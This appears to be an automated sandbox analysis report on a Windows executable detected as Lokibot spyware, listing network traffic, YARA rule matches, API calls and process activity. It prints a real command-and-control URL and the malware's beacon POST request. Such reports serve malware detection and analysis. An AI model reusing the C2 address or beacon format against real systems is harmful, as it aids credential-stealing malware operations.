                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:00 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iotQdWvLirTujDm5gcFSZO5hAVcZRC711g1iSDRI0%2Brb3822z%2BZAkRmuSDHdic5Uj57iNRI9xX3TN9YhS73pU0g3Awy8opYScVWOMDtQ3fUBF1pTWEZk13UdVN58f%2F5cQx2fm8PSSX%2BiO3wOmcduLTFZflpDzA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1abfe1005b3-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:01 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CiMowfP3p1ILABVXu8os0ZvSOz0H05YMNivh25CZUCDEqQaAY7dMsK8WCuL55RhExNK%2Bo6QnXW2OoiY91LV4aaKszjnsVP1HpaPN5F1rSwA%2BPDZXqH2LcFbJP9o0ixVca8u%2FnOqGjaVHkzJnEmiYU0ivx8ExBw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1b2eb3f1f2d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:02 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ga%2FiBjWS7EnclaPLKo1yPnxw%2BS5FfTFKHZyEfv8SBx7PLc2z9qVP39s4Ou2jxC%2Fu692YAeRobnrXUUs%2FH5lz44oFoe0MdOk11UK7d0oa85kJs8BzBG9Wn1TN%2BaAxNOIaqjCVMknge%2BA0NpNTHFqXMCVwFECLVA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1b9fcbb4a6d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:03 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lYEXv8S4QiPBTpXu0rf5bJXcJoQvbh8c7zrS9vvc7tBBFtqt%2FvJ59pUThsIsz8qJpgBGda1LHR3Qb02pkkKRC8u7P6%2BBRoVadCg8Od0Z6UP29X6bSAT1Hn6xm8BlysHdhvQ59Xz1U2tY28nHS%2BqgJgDxQY4HdA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1c14c3ad6f5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:04 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yauK70pfnNL%2FJ90goDaRLF0fpdY6QkzTDmTkMnqaOy%2Bzsu%2BpC4W1kWkeLla6LwdlVBR9OMv4e4x9fXwxwON1%2FUNUz5VC3UtbTzqe0Ta8KCEmGddTn%2FYX5GbiYSC%2B8T4y3Jh3h%2FGtVWT8LEgia0f88sVfgxwueQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1c88f4e3258-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:06 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FqfohRhEiuDGtoufJZoPIftug9rZXOY0iplMIhBxlnIZUjBXtab%2FI2jNrquCvC6cysFzwjayYPJM%2BQ8Xe4Icd2EQlB4ETqyyfmXIN7wgx7vriAXvx8gP%2BAmVX2ww%2FgOFnLGPHUENBicNBv5tAeMhrHNfgSR2tA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1cf4b1f63a7-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:07 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eh8lR2VHuAd%2FabpYZW9tpbFbJtxx01L9yZN5vGSXcrxQt3sIQfCGSqyacaB9%2B3Hw2oVJwF7e7qyBl6EoN3hd1Wz7J66UUWTW97%2FegdbTRtYUGZPwPUIns9dbsm4VjmIJ9oYFMURDSLbk44n2badK3lPcW%2BIZzA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1d6ad835bf5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:08 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M5tlpUopTFHdy2B09YRTb%2FcsTy7c1X2dY3sawEtin9CRp7iwQ7kHGGeqkAEUkgyYEQSHRIXi8G%2B0%2FPlXdk8CRXuTrtKeambiuJ5qPkn23PNVP4W0WpwprTjFbDp1IbPCTt%2F3Cd91aLWDrwa0e1cclMTu%2Brzvhw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1decf8e5373-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:09 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gHyoRfXpo3hYuDnMEqyfZQc%2BSSKitG5uVBPt%2FzcNSAReJa%2FdnOJKlN8woQLzqA6DJAKzj%2BBAgAMnotpu0f8pMIviMGE3p2X%2FOL6fJxdXzYrzgTzXXn262LF8tX4wih8wIb1Yn%2F1EvqCxP1YMpsu0Nm4iCqvv%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1e69e5e4e50-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:11 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XYPD7fSpOyQ9pBkkU7r%2Fv6SPQi%2By9UIzK%2B1PLsu1iFdzjzfJxzg08bwcNFnidoj1OFoTBYyGcRQqcfhRC5k8KnU8iYCvp%2FGLncP9ixeP9Nbj206KsQTvNUsDuvNAU27cTMUZR%2BeQ6CClwmRmdofqKK5juL3eYA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1ef9dc84e2b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:13 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x2j5ZLeoHVLB0M3bMqX0PzaoLtVYEwCKEvGv1b3ZVT4MA7hLssUg4vrSoTR%2FE5D5SrSs6jQ1VXmZshZU40BlhiqRYtlB0oP0EeQEYcVIqQcXMEb13j5XLdZzrzFppZlNUH%2BxojLr5SNYRD263tyDlV%2Fqs9%2BBWg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec1fbbfb5beec-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:15 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qIfWEe%2F6jyIr5T7SRE1AvZoCaCYM%2FbFVg7K%2BtIrH%2Bg2cqN5BZ7bF9LkzYb8H4TcHvLJGxjEene%2BEEAvpDhWU%2BAObyNoj5WQ%2FY8B2zI6QnfWVy2Mj3GhLDrM5%2B3ZllzuKto5k5eS%2FKyLRpb%2B6WFBaRW9j4UK%2F8Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec209ed614e3e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:16 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MOgqfzVELnT4zNLoiR%2FSN41Qdg4UYQCVdsKnFsPBrdghsXz7OOBzVnpKSPLQWJtPGBZRxeNAZ9xU4Mal%2FMaGqsNeP9SMc6UxO7qEZCv8h9fhuYogsRPNLHTuEjgFMYjq%2FGbTIEqvZDq8c1MmmAw0PfhreX1fCA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec2124acf0eb7-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:30:18 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gxrVYDOVXCBXXewOH%2FJU78gmxBsZecNbyMCnQdhrynqYFCdLKoi%2BShuwRk3Wm6%2FFRdZt4dRQp2jPFEqfRpnLiPRvSx4RTqGet2X%2FOMvn5mcIBV960f5eIbfgCr3beNWQckv5%2F3qaZ1oRCAtM9L4XUXoBg8vx1A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69dec21c7f1e6964-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: aZOmps0Ug8.exe, 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmpString found in binary or memory: http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                Source: aZOmps0Ug8.exe, 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmpString found in binary or memory: http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.phpA
                Source: aZOmps0Ug8.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
                Source: aZOmps0Ug8.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: aZOmps0Ug8.exe, aZOmps0Ug8.exe, 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: unknownHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 196Connection: close
                Source: unknownDNS traffic detected: queries for: 74f26d34ffff049368a6cff8812f86ee.gq
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_00404ED4 recv,
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: aZOmps0Ug8.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                Source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.1.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.aZOmps0Ug8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.2.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 0.2.aZOmps0Ug8.exe.f030000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 1.1.aZOmps0Ug8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_004047D3
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_004061D4
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_10008836
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_10003D10
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_100110E1
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1000F902
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_100119AC
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_100059B1
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1001A9FA
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1001AA09
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1000B23E
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1000FE74
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_10005EA5
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_100062BD
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_100066F2
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_10006B27
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_1000F390
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_0040549C
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_004029D4
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: String function: 0041219C appears 45 times
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: String function: 00405B6F appears 42 times
                Source: aZOmps0Ug8.exe, 00000000.00000003.348584665.000000000F186000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs aZOmps0Ug8.exe
                Source: aZOmps0Ug8.exeVirustotal: Detection: 43%
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile read: C:\Users\user\Desktop\aZOmps0Ug8.exeJump to behavior
                Source: aZOmps0Ug8.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknownProcess created: C:\Users\user\Desktop\aZOmps0Ug8.exe 'C:\Users\user\Desktop\aZOmps0Ug8.exe'
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess created: C:\Users\user\Desktop\aZOmps0Ug8.exe 'C:\Users\user\Desktop\aZOmps0Ug8.exe'
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeProcess created: C:\Users\user\Desktop\aZOmps0Ug8.exe 'C:\Users\user\Desktop\aZOmps0Ug8.exe'
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile created: C:\Users\user\AppData\Local\Temp\nsj153F.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@81/3
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeFile read: C:\Users\desktop.iniJump to behavior
